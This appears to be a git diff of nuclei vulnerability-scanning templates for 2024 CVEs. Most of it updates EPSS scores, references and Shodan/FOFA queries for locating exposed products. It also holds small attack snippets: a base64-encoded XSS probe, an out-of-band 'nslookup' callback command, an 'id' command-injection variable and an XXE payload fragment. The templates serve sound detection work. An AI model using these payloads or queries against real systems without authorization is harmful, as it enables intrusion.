CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2024-1709 - cwe-id: CWE-288 + cwe-id: CWE-288,NVD-CWE-Other + epss-score: 0.94464 + epss-percentile: 0.99213 + cpe: cpe:2.3:a:connectwise:screenconnect:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-20767.yaml b/http/cves/2024/CVE-2024-20767.yaml index d57dff21dd..4b386cd7ef 100644 --- a/http/cves/2024/CVE-2024-20767.yaml +++ b/http/cves/2024/CVE-2024-20767.yaml @@ -10,13 +10,15 @@ info: - https://jeva.cc/2973.html - https://nvd.nist.gov/vuln/detail/CVE-2024-20767 - https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html + - https://github.com/Praison001/CVE-2024-20767-Adobe-ColdFusion + - https://github.com/Hatcat123/my_stars classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N cvss-score: 8.2 cve-id: CVE-2024-20767 cwe-id: CWE-284 - epss-score: 0.00087 - epss-percentile: 0.35684 + epss-score: 0.08221 + epss-percentile: 0.94345 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-21644.yaml b/http/cves/2024/CVE-2024-21644.yaml index 4cb683498d..99bff48091 100644 --- a/http/cves/2024/CVE-2024-21644.yaml +++ b/http/cves/2024/CVE-2024-21644.yaml @@ -12,13 +12,15 @@ info: - https://github.com/advisories/GHSA-mqpq-2p68-46fv - https://github.com/fkie-cad/nvd-json-data-feeds - https://nvd.nist.gov/vuln/detail/CVE-2024-21644 + - https://github.com/ltranquility/CVE-2024-21644-Poc + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-21644 cwe-id: CWE-284 - epss-score: 0.41231 - epss-percentile: 0.97205 + epss-score: 0.14751 + epss-percentile: 0.95779 cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +29,8 @@ info: product: pyload shodan-query: html:"pyload" zoomeye-query: app:"pyLoad" + fofa-query: title="login - pyload" + google-query: intitle:"login - pyload" tags: cve,cve2024,python,pip,pyload,access-control http: diff --git a/http/cves/2024/CVE-2024-21645.yaml b/http/cves/2024/CVE-2024-21645.yaml index 78b42790ec..40f8b5da22 100644 --- a/http/cves/2024/CVE-2024-21645.yaml +++ b/http/cves/2024/CVE-2024-21645.yaml @@ -26,6 +26,9 @@ info: vendor: pyload product: pyload shodan-query: "title:\"pyload\"" + fofa-query: title="login - pyload" + google-query: intitle:"login - pyload" + zoomeye-query: app:"pyload" tags: cve,cve2024,pyload,authenticated,injection variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2024/CVE-2024-21683.yaml b/http/cves/2024/CVE-2024-21683.yaml index aca95fbafd..ce5d967f29 100644 --- a/http/cves/2024/CVE-2024-21683.yaml +++ b/http/cves/2024/CVE-2024-21683.yaml @@ -20,10 +20,9 @@ info: epss-score: 0.00043 epss-percentile: 0.0866 metadata: - fofa-query: app="ATLASSIAN-Confluence" verified: true + fofa-query: app="ATLASSIAN-Confluence" tags: cve,cve2024,atlassian,confluence,rce,authenticated,intrusive - variables: username: "{{username}}" password: "{{password}}" diff --git a/http/cves/2024/CVE-2024-21887.yaml b/http/cves/2024/CVE-2024-21887.yaml index 700c4f220d..2b72f878a0 100644 --- a/http/cves/2024/CVE-2024-21887.yaml +++ b/http/cves/2024/CVE-2024-21887.yaml @@ -16,15 +16,17 @@ info: cvss-score: 9.1 cve-id: CVE-2024-21887 cwe-id: CWE-77 - epss-score: 0.97322 - epss-percentile: 0.99871 + epss-score: 0.97334 + epss-percentile: 0.99886 cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ivanti product: connect_secure shodan-query: "html:\"welcome.cgi?p=logo\"" - tags: cve,cve2024,kev,rce,ivanti + fofa-query: body="welcome.cgi?p=logo" + google-query: intitle:"ivanti connect secure" + tags: packetstorm,cve,cve2024,kev,rce,ivanti http: - raw: diff --git a/http/cves/2024/CVE-2024-21893.yaml b/http/cves/2024/CVE-2024-21893.yaml index 0727b749b5..86e3acadc2 100644 --- a/http/cves/2024/CVE-2024-21893.yaml +++ b/http/cves/2024/CVE-2024-21893.yaml @@ -25,6 +25,8 @@ info: vendor: ivanti product: connect_secure shodan-query: "html:\"welcome.cgi?p=logo\"" + fofa-query: body="welcome.cgi?p=logo" + google-query: intitle:"ivanti connect secure" tags: cve,cve2024,kev,ssrf,ivanti http: diff --git a/http/cves/2024/CVE-2024-22024.yaml b/http/cves/2024/CVE-2024-22024.yaml index 2dd07ad283..75c51f20ac 100644 --- a/http/cves/2024/CVE-2024-22024.yaml +++ b/http/cves/2024/CVE-2024-22024.yaml @@ -18,8 +18,9 @@ info: vendor: ivanti product: connect_secure shodan-query: "html:\"welcome.cgi?p=logo\"" + fofa-query: body="welcome.cgi?p=logo" + google-query: intitle:"ivanti connect secure" tags: cve,cve2024,xxe,ivanti - variables: payload: ' %watchTowr;]>' diff --git a/http/cves/2024/CVE-2024-22319.yaml b/http/cves/2024/CVE-2024-22319.yaml index 71c5bc0edc..d2f4fe807d 100644 --- a/http/cves/2024/CVE-2024-22319.yaml +++ b/http/cves/2024/CVE-2024-22319.yaml @@ -11,8 +11,8 @@ info: cvss-score: 9.8 cve-id: CVE-2024-22319 cwe-id: CWE-74 - epss-score: 0.00283 - epss-percentile: 0.67752 + epss-score: 0.29329 + epss-percentile: 0.96896 cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-22927.yaml b/http/cves/2024/CVE-2024-22927.yaml index e0131eacea..3da874ab23 100644 --- a/http/cves/2024/CVE-2024-22927.yaml +++ b/http/cves/2024/CVE-2024-22927.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2024-22927 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26844 + epss-score: 0.10809 + epss-percentile: 0.95082 cpe: cpe:2.3:a:eyoucms:eyoucms:1.6.5:*:*:*:*:*:*:* metadata: vendor: eyoucms diff --git a/http/cves/2024/CVE-2024-2340.yaml b/http/cves/2024/CVE-2024-2340.yaml index 7d39720ff7..8411fcbd94 100644 --- a/http/cves/2024/CVE-2024-2340.yaml +++ b/http/cves/2024/CVE-2024-2340.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-2340 - epss-score: 0.00043 - epss-percentile: 0.08267 + epss-score: 0.00053 + epss-percentile: 0.21091 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-23917.yaml b/http/cves/2024/CVE-2024-23917.yaml index 1a387b8796..6ee3fb94af 100644 --- a/http/cves/2024/CVE-2024-23917.yaml +++ b/http/cves/2024/CVE-2024-23917.yaml @@ -22,8 +22,10 @@ info: max-request: 1 vendor: jetbrains product: teamcity + shodan-query: http.title:teamcity + fofa-query: title=teamcity + google-query: intitle:teamcity tags: cve,cve2024,auth-bypass,teamcity - flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-24131.yaml b/http/cves/2024/CVE-2024-24131.yaml index 9cab50258d..1d53daef76 100644 --- a/http/cves/2024/CVE-2024-24131.yaml +++ b/http/cves/2024/CVE-2024-24131.yaml @@ -20,9 +20,11 @@ info: metadata: verified: true max-request: 1 - shodan-query: title:"SuperWebMailer" vendor: superwebmailer product: superwebmailer + shodan-query: title:"SuperWebMailer" + fofa-query: title="superwebmailer" + google-query: intitle:"superwebmailer" tags: cve,cve2024,superwebmailer,xss http: diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 65c258a931..212090615c 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -10,12 +10,12 @@ info: - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/ - https://support.checkpoint.com/results/sk/sk182337 metadata: + verified: true max-request: 1 vendor: checkpoint product: quantum_security_gateway - cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:* shodan-query: html:"Check Point SSL Network" - verified: true + cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:* tags: cve,cve2024,checkpoint,lfi http: diff --git a/http/cves/2024/CVE-2024-25735.yaml b/http/cves/2024/CVE-2024-25735.yaml index 198d9060bc..f38f1da37a 100644 --- a/http/cves/2024/CVE-2024-25735.yaml +++ b/http/cves/2024/CVE-2024-25735.yaml @@ -9,6 +9,12 @@ info: reference: - https://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt - https://packetstormsecurity.com/files/cve/CVE-2024-25735 + - http://packetstormsecurity.com/files/177082 + - https://hyp3rlinx.altervista.org + - https://github.com/codeb0ss/CVE-2024-25735-PoC + classification: + epss-score: 0.00381 + epss-percentile: 0.72907 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-26331.yaml b/http/cves/2024/CVE-2024-26331.yaml index a2b5dd920f..f142818e0c 100644 --- a/http/cves/2024/CVE-2024-26331.yaml +++ b/http/cves/2024/CVE-2024-26331.yaml @@ -1,19 +1,25 @@ id: CVE-2024-26331 -info: - name: ReCrystallize Server - Authentication Bypass - author: Carson Chan - severity: high - description: | - This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed. - reference: - - https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/ - metadata: - verified: true - max-request: 1 - shodan-query: title:"ReCrystallize" - tags: cve,cve02024,recrystallize,auth-bypass - +info: + name: ReCrystallize Server - Authentication Bypass + author: Carson Chan + severity: high + description: | + This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed. + reference: + - https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/ + - https://sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/ + - https://www.recrystallize.com/merchant/ReCrystallize-Server-for-Crystal-Reports.htm + - https://github.com/Ostorlab/KEV + classification: + epss-score: 0.00053 + epss-percentile: 0.21091 + metadata: + verified: true + max-request: 1 + shodan-query: title:"ReCrystallize" + tags: cve,cve02024,recrystallize,auth-bypass + http: - method: GET path: diff --git a/http/cves/2024/CVE-2024-27198.yaml b/http/cves/2024/CVE-2024-27198.yaml index fc07165948..16cc2426d8 100644 --- a/http/cves/2024/CVE-2024-27198.yaml +++ b/http/cves/2024/CVE-2024-27198.yaml @@ -26,6 +26,8 @@ info: vendor: jetbrains product: teamcity shodan-query: http.component:"TeamCity" + fofa-query: title=teamcity + google-query: intitle:teamcity tags: cve,cve2024,teamcity,jetbrains,auth-bypass,kev http: diff --git a/http/cves/2024/CVE-2024-27956.yaml b/http/cves/2024/CVE-2024-27956.yaml index 3c5c29ab95..6edaacd41d 100644 --- a/http/cves/2024/CVE-2024-27956.yaml +++ b/http/cves/2024/CVE-2024-27956.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.9 cve-id: CVE-2024-27956 cwe-id: CWE-89 - epss-score: 0.00043 - epss-percentile: 0.08203 + epss-score: 0.0005 + epss-percentile: 0.1901 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-28255.yaml b/http/cves/2024/CVE-2024-28255.yaml index 8ce2c581ea..5d6038443a 100644 --- a/http/cves/2024/CVE-2024-28255.yaml +++ b/http/cves/2024/CVE-2024-28255.yaml @@ -11,19 +11,19 @@ info: - https://github.com/open-metadata/OpenMetadata/blob/e2043a3f31312ebb42391d6c93a67584d798de52/openmetadata-service/src/main/java/org/openmetadata/service/security/JwtFilter.java#L113 - https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-6wx7-qw5p-wh84 - https://nvd.nist.gov/vuln/detail/CVE-2024-28255 + - https://github.com/wy876/wiki classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-28255 cwe-id: CWE-287 - epss-score: 0.00045 - epss-percentile: 0.12989 + epss-score: 0.00087 + epss-percentile: 0.36659 metadata: verified: true max-request: 1 shodan-query: http.favicon.hash:733091897 tags: cve,cve2024,openmetadata,rce,auth-bypass - variables: callback: "{{interactsh-url}}" cmd: "nslookup {{callback}}" diff --git a/http/cves/2024/CVE-2024-28734.yaml b/http/cves/2024/CVE-2024-28734.yaml index d7cb5481c3..6590760ff5 100644 --- a/http/cves/2024/CVE-2024-28734.yaml +++ b/http/cves/2024/CVE-2024-28734.yaml @@ -16,7 +16,7 @@ info: epss-percentile: 0.12994 metadata: max-request: 1 - tags: cve,cve2024,coda,xss + tags: packetstorm,cve,cve2024,coda,xss http: - raw: diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml index 27dc05462e..a52bb5c2b4 100644 --- a/http/cves/2024/CVE-2024-2879.yaml +++ b/http/cves/2024/CVE-2024-2879.yaml @@ -3,7 +3,7 @@ id: CVE-2024-2879 info: name: WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection author: d4ly - severity: critical + severity: high description: | The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. remediation: Fixed in 7.10.1 @@ -14,18 +14,21 @@ info: - https://layerslider.com/release-log/ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3fddf96e-029c-4753-ba82-043ca64b78d3?source=cve classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2024-2879 cwe-id: CWE-89 - epss-score: 0.00043 - epss-percentile: 0.07687 + epss-score: 0.00492 + epss-percentile: 0.76133 + cpe: cpe:2.3:a:layerslider:layerslider:7.9.11:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 + vendor: layerslider + product: layerslider + framework: wordpress publicwww-query: "/wp-content/plugins/LayerSlider/" tags: cve,cve2024,wp-plugin,wp,wordpress,layerslider,sqli - flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-29059.yaml b/http/cves/2024/CVE-2024-29059.yaml index 359178ba06..92a8ee3e7e 100644 --- a/http/cves/2024/CVE-2024-29059.yaml +++ b/http/cves/2024/CVE-2024-29059.yaml @@ -9,18 +9,21 @@ info: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29059 - https://code-white.com/blog/leaking-objrefs-to-exploit-http-dotnet-remoting/ - https://github.com/codewhitesec/HttpRemotingObjRefLeak + - https://github.com/NaInSec/CVE-LIST + - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-29059 - epss-score: 0.00043 - epss-percentile: 0.07503 + cwe-id: CWE-209 + epss-score: 0.01259 + epss-percentile: 0.85581 cpe: cpe:2.3:a:microsoft:.net_framework:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: 'Server: MS .NET Remoting' vendor: microsoft product: .net_framework + shodan-query: 'Server: MS .NET Remoting' tags: cve,cve2024,dotnet,microsoft,remoting,deserialization http: diff --git a/http/cves/2024/CVE-2024-29269.yaml b/http/cves/2024/CVE-2024-29269.yaml index 50f03735cc..187f9319f2 100644 --- a/http/cves/2024/CVE-2024-29269.yaml +++ b/http/cves/2024/CVE-2024-29269.yaml @@ -9,10 +9,15 @@ info: reference: - https://github.com/wutalent/CVE-2024-29269/blob/main/index.md - https://gist.github.com/win3zz/c26047ae4b182c3619509d537b808d2b + - https://github.com/Ostorlab/KEV + - https://github.com/YongYe-Security/CVE-2024-29269 + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-29269 + epss-score: 0.00054 + epss-percentile: 0.21518 metadata: max-request: 1 shodan-query: title:"Login to TLR-2005KSH" diff --git a/http/cves/2024/CVE-2024-3097.yaml b/http/cves/2024/CVE-2024-3097.yaml index 4c3d3c3a57..e8e1642a26 100644 --- a/http/cves/2024/CVE-2024-3097.yaml +++ b/http/cves/2024/CVE-2024-3097.yaml @@ -16,14 +16,16 @@ info: cvss-score: 5.3 cve-id: CVE-2024-3097 cwe-id: CWE-862 - epss-score: 0.00052 - epss-percentile: 0.19521 + epss-score: 0.04672 + epss-percentile: 0.92605 cpe: cpe:2.3:a:imagely:nextgen_gallery:*:*:*:*:*:wordpress:*:* metadata: vendor: imagely product: nextgen_gallery framework: wordpress publicwww-query: "/wp-content/plugins/nextgen-gallery/" + shodan-query: cpe:"cpe:2.3:a:imagely:nextgen_gallery" + fofa-query: body=/wp-content/plugins/nextgen-gallery/ tags: cve,cve2024,wordpress,nextgen-gallery,wp-plugin,info-leak http: diff --git a/http/cves/2024/CVE-2024-3136.yaml b/http/cves/2024/CVE-2024-3136.yaml index 1239487900..2e7bdcca6a 100644 --- a/http/cves/2024/CVE-2024-3136.yaml +++ b/http/cves/2024/CVE-2024-3136.yaml @@ -19,14 +19,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-3136 - epss-score: 0.00045 - epss-percentile: 0.14274 + epss-score: 0.00065 + epss-percentile: 0.28259 metadata: - publicwww-query: "/wp-content/plugins/masterstudy-lms-learning-management-system" verified: true max-request: 2 + publicwww-query: "/wp-content/plugins/masterstudy-lms-learning-management-system" tags: cve,cve2024,wp,wordpress,unauth,lfi - variables: randomstr: "{{randstr_1}}" marker: "{{base64(randomstr)}}" diff --git a/http/cves/2024/CVE-2024-31848.yaml b/http/cves/2024/CVE-2024-31848.yaml index f7a29f8442..63cc3fa62d 100644 --- a/http/cves/2024/CVE-2024-31848.yaml +++ b/http/cves/2024/CVE-2024-31848.yaml @@ -11,19 +11,19 @@ info: - https://github.com/Stuub/CVE-2024-31848-PoC/blob/main/CVE-2024-31848.py - https://www.tenable.com/cve/CVE-2024-31848 - https://www.tenable.com/security/research/tra-2024-09 + - https://github.com/Stuub/CVE-2024-31848-PoC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-31848 cwe-id: CWE-22 - epss-score: 0.00044 - epss-percentile: 0.09773 + epss-score: 0.00054 + epss-percentile: 0.21518 metadata: verified: true max-request: 1 shodan-query: title:"CData - API Server" tags: cve,cve2024,cdata,lfi - flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-31849.yaml b/http/cves/2024/CVE-2024-31849.yaml index 5d341c440a..3879c0511b 100644 --- a/http/cves/2024/CVE-2024-31849.yaml +++ b/http/cves/2024/CVE-2024-31849.yaml @@ -10,19 +10,20 @@ info: - https://www.tenable.com/security/research/tra-2024-09 - https://www.cdata.com/kb/entries/jetty-cve-0324.rst - https://nvd.nist.gov/vuln/detail/CVE-2024-31849 + - https://github.com/Ostorlab/KEV + - https://github.com/Stuub/CVE-2024-31848-PoC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-31849 cwe-id: CWE-22 - epss-score: 0.00044 - epss-percentile: 0.09652 + epss-score: 0.00053 + epss-percentile: 0.21091 metadata: verified: true max-request: 1 shodan-query: title:"CData Connect" tags: cve,cve2024,cdata,lfi - flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-31850.yaml b/http/cves/2024/CVE-2024-31850.yaml index dee808c0be..9b18e3423e 100644 --- a/http/cves/2024/CVE-2024-31850.yaml +++ b/http/cves/2024/CVE-2024-31850.yaml @@ -9,19 +9,19 @@ info: reference: - https://www.tenable.com/security/research/tra-2024-09 - https://nvd.nist.gov/vuln/detail/CVE-2024-31850 + - https://github.com/Stuub/CVE-2024-31848-PoC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L cvss-score: 8.6 cve-id: CVE-2024-31850 cwe-id: CWE-22 - epss-score: 0.00044 - epss-percentile: 0.09773 + epss-score: 0.00053 + epss-percentile: 0.21091 metadata: verified: true max-request: 1 shodan-query: title:"CData Arc" tags: cve,cve2024,cdata,lfi - flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-32399.yaml b/http/cves/2024/CVE-2024-32399.yaml index bdfa872f02..0eb5208772 100644 --- a/http/cves/2024/CVE-2024-32399.yaml +++ b/http/cves/2024/CVE-2024-32399.yaml @@ -13,8 +13,8 @@ info: - https://github.com/NN0b0dy/CVE-2024-32399 - https://github.com/nomi-sec/PoC-in-GitHub classification: - epss-score: 0.00043 - epss-percentile: 0.08167 + epss-score: 0.00053 + epss-percentile: 0.21091 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-3273.yaml b/http/cves/2024/CVE-2024-3273.yaml index eb7b78365f..1b1d0864ab 100644 --- a/http/cves/2024/CVE-2024-3273.yaml +++ b/http/cves/2024/CVE-2024-3273.yaml @@ -2,7 +2,7 @@ id: CVE-2024-3273 info: name: D-Link Network Attached Storage - Command Injection and Backdoor Account author: pussycat0x - severity: high + severity: critical description: | UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. reference: @@ -12,17 +12,19 @@ info: - https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10383 - https://vuldb.com/?ctiid.259284 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L - cvss-score: 7.3 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2024-3273 cwe-id: CWE-77 - epss-score: 0.00044 - epss-percentile: 0.09057 + epss-score: 0.83361 + epss-percentile: 0.98438 + cpe: cpe:2.3:o:dlink:dns-320l_firmware:-:*:*:*:*:*:*:* metadata: verified: true + vendor: dlink + product: dns-320l_firmware fofa-query: app="D_Link-DNS-ShareCenter" tags: cve,cve2024,dlink,nas,kev - variables: cmd: "id" diff --git a/http/cves/2024/CVE-2024-33575.yaml b/http/cves/2024/CVE-2024-33575.yaml index df83db4763..dc989fce6e 100644 --- a/http/cves/2024/CVE-2024-33575.yaml +++ b/http/cves/2024/CVE-2024-33575.yaml @@ -16,13 +16,15 @@ info: cvss-score: 5.3 cve-id: CVE-2024-33575 cwe-id: CWE-200 - epss-score: 0.00043 - epss-percentile: 0.08268 + epss-score: 0.00053 + epss-percentile: 0.21091 metadata: vendor: User Meta product: User Meta framework: wordpress publicwww-query: "/wp-content/plugins/user-meta/" + shodan-query: http.html:/wp-content/plugins/user-meta/ + fofa-query: body=/wp-content/plugins/user-meta/ tags: wpscan,cve,cve2024,user-meta,wordpress,wp-plugin,info-leak http: diff --git a/http/cves/2024/CVE-2024-33724.yaml b/http/cves/2024/CVE-2024-33724.yaml index 65df9f2f55..ae77343cca 100644 --- a/http/cves/2024/CVE-2024-33724.yaml +++ b/http/cves/2024/CVE-2024-33724.yaml @@ -15,6 +15,7 @@ info: vendor: soplanning product: soplanning shodan-query: html:"soplanning" + fofa-query: body="soplanning" tags: packetstorm,cve,cve2024,authenticated,soplanning,xss http: diff --git a/http/cves/2024/CVE-2024-3400.yaml b/http/cves/2024/CVE-2024-3400.yaml index 9aa9ce94e7..4582984158 100644 --- a/http/cves/2024/CVE-2024-3400.yaml +++ b/http/cves/2024/CVE-2024-3400.yaml @@ -10,22 +10,24 @@ info: - https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/ - https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis - https://nvd.nist.gov/vuln/detail/CVE-2024-3400 + - https://github.com/zam89/CVE-2024-3400-pot + - https://github.com/ZephrFish/CVE-2024-3400-Canary classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2024-3400 - cwe-id: CWE-77 - epss-score: 0.00371 - epss-percentile: 0.72356 - cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:*:*:*:*:*:*:* + cwe-id: CWE-20,CWE-77 + epss-score: 0.95703 + epss-percentile: 0.99417 + cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:-:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: icon_hash="-631559155" - shodan-query: http.favicon.hash:-631559155 - product: pan-os vendor: paloaltonetworks - tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev + product: pan-os + shodan-query: http.favicon.hash:-631559155 + fofa-query: icon_hash="-631559155" + tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev,intrusive http: - raw: diff --git a/http/cves/2024/CVE-2024-4040.yaml b/http/cves/2024/CVE-2024-4040.yaml index 3830add6ba..f1cc825297 100644 --- a/http/cves/2024/CVE-2024-4040.yaml +++ b/http/cves/2024/CVE-2024-4040.yaml @@ -29,8 +29,8 @@ info: vendor: crushftp product: crushftp shodan-query: html:"CrushFTP" + fofa-query: body="crushftp" tags: cve,cve2024,lfr,crushftp,vfs,kev - flow: | if ( !template.hasOwnProperty('username') || !template.hasOwnProperty('password') ) { // if username or password is not provided, run unauthenticated exploit diff --git a/http/cves/2024/CVE-2024-4348.yaml b/http/cves/2024/CVE-2024-4348.yaml index 58c0113dd0..3db7899504 100644 --- a/http/cves/2024/CVE-2024-4348.yaml +++ b/http/cves/2024/CVE-2024-4348.yaml @@ -9,11 +9,16 @@ info: reference: - https://packetstormsecurity.com/files/178375/osCommerce-4-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2024-4348 + - https://vuldb.com/?ctiid.262488 + - https://vuldb.com/?id.262488 + - https://vuldb.com/?submit.320855 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N cvss-score: 4.3 cve-id: CVE-2024-4348 cwe-id: CWE-79 + epss-score: 0.00065 + epss-percentile: 0.28259 metadata: verified: true max-request: 2 From e76f6aa44f9a716e5e5ae05806f0b7aa476abad0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 1 Jun 2024 11:29:10 +0530 Subject: [PATCH 547/847] updated format, matchers and template path --- CVE-2024-3822.yaml | 27 ------------------------ http/cves/2024/CVE-2024-3822.yaml | 34 +++++++++++++++++++++++++++++++ 2 files changed, 34 insertions(+), 27 deletions(-) delete mode 100644 CVE-2024-3822.yaml create mode 100644 http/cves/2024/CVE-2024-3822.yaml diff --git a/CVE-2024-3822.yaml b/CVE-2024-3822.yaml deleted file mode 100644 index 16f028eca3..0000000000 --- a/CVE-2024-3822.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2024-3822 - -info: - name: Base64 Encoder/Decoder <= 0.9.2 - Reflected XSS - author: omranisecurity - severity: medium - description: | - - The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. - reference: | - - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3822/ - metadata: - fofa-query: "wp-content/plugins/base64-encoderdecoder/" - max-request: 3 - tags: cve,wordpress,plugin,xss - -http: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/base64-encoderdecoder/base64-decode.php?string=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(body, "")' - condition: and \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3822.yaml b/http/cves/2024/CVE-2024-3822.yaml new file mode 100644 index 0000000000..efebda38db --- /dev/null +++ b/http/cves/2024/CVE-2024-3822.yaml @@ -0,0 +1,34 @@ +id: CVE-2024-3822 + +info: + name: Base64 Encoder/Decoder <= 0.9.2 - Cross-Site Scripting + author: omranisecurity + severity: medium + description: | + The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, 